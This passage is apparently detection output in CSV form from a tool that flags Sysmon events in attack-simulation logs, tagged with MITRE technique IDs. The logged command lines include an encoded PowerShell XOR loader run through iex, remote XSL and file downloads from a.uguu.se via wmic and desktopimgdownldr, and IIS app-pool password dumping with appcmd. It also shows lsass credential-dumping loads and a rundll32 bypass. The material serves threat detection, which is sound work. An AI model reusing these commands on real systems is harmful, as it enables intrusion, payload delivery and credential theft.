QBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1025 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:45:34.528 + 365ABB72-DC3E-5CE6-0000-00102BC97200 + 712 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CE6D-5CE6-0000-00109E190100 + 1472 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 896 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:08.258 + 365ABB72-CF04-5CE6-0000-001010F20C00 + 4056 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4919 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.756 + 747F3D96-6628-5D3F-0000-0010B1968800 + 5708 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 18 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 16:58:12.919 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5922 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.322 + 365ABB72-3D6E-5CEB-0000-00104C92FF00 + 3100 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5260 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 20:17:52.899 + 365ABB72-AB70-5C8E-0000-0010781D0A00 + 3272 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat" + C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\ + PC04\IEUser + 365ABB72-A960-5C8E-0000-002004C00300 + 0x3c004 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-A965-5C8E-0000-0010D9100400 + 3884 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424261 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:22.062 + 747F3D96-51FE-5F93-0000-0010DC535E00 + 8920 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" DATAUS~1.DLL f8755 4624665222 rd + C:\PROGRA~3\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.282154,2019-05-27T05:29:18.282154+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5919 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.232 + 365ABB72-3D6E-5CEB-0000-00108C8EFF00 + 3144 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Description: Cannot read configuration file due to insufficient permissions" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1593766040.077424,2020-07-03T12:47:20.077424+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 305352 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-03 08:47:20.001 + 747F3D96-F098-5EFE-0000-001012E13801 + 1932 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-1CE4-5EFE-0000-0020CC9C0800 + 0x89ccc + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-EF3D-5EFE-0000-0010F3653401 + 5384 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1560582872.809734,2019-06-15T11:14:32.809734+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 4443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 